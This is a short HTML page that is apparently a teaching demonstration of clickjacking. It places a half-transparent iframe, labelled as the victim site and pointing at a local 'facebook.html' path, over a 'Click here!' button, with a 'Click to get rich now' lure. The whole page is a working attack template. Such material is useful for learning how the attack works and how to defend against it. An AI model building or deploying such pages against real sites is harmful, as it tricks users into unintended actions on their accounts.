<!DOCTYPE html>
<html>

<body>
    <style>
        iframe { /* from the victim side */
            width: 400px;
            height: 100px;
            position: absolute;
            top: 0;
            left: -20px;
            opacity: 0.5;
            z-index: 1;
        }
    </style>

    <div> Click to get rich now:</div>

    <!-- the url from the victim site -->
    <iframe src="/clickjacking/facebook.html"></iframe>

    <button> Click here! </button>

    <div> ...And you're cool (I'm a cool hacker actually)! </div>
</body>

</html>